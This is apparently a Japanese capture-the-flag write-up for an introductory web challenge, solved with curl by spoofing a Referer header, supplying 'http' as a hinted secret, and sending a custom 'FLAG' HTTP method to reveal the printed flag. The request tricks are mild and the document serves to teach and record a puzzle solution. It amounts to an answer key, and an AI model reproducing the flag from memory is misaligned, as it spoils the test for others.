Hopefully you know how web works...
http://18.184.219.56:8080/
URLが渡される。
アクセスすると、http://flagland.internal/から来いと怒られる。

Refererだろうとあたりをつけ、curlする。
$ curl -H 'Referer: http://flagland.internal/' http://18.184.219.56:8080/
<!DOCTYPE html>
<html>
~~~
<body>
<div class="msg" style="">
Unspecified "secret". </div>
</body>
</html>secretが必要らしい。
$ curl -H 'Referer: http://flagland.internal/' http://18.184.219.56:8080/?secret=satoki
<!DOCTYPE html>
<html>
~~~
<body>
<div class="msg" style="">
Incorrect secret. <!-- hint: secret is ____ which is the name of the protocol that both this server and your browser agrees on... --> </div>
</body>
</html>プロトコル名なのでhttpとしてやればよい。
$ curl -H 'Referer: http://flagland.internal/' http://18.184.219.56:8080/?secret=http
<!DOCTYPE html>
<html>
~~~
<body>
<div class="msg" style="">
Sorry we don't have "GET" here but we might have other things like "FLAG". </div>
</body>
</html>注文が多いが、GETではなくFLAGにすればよいようだ。
$ curl -H 'Referer: http://flagland.internal/' http://18.184.219.56:8080/?secret=http -X 'FLAG'
<!DOCTYPE html>
<html>
~~~
<body>
<div class="msg" style="">
MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f} </div>
</body>
</html>flagが得られた。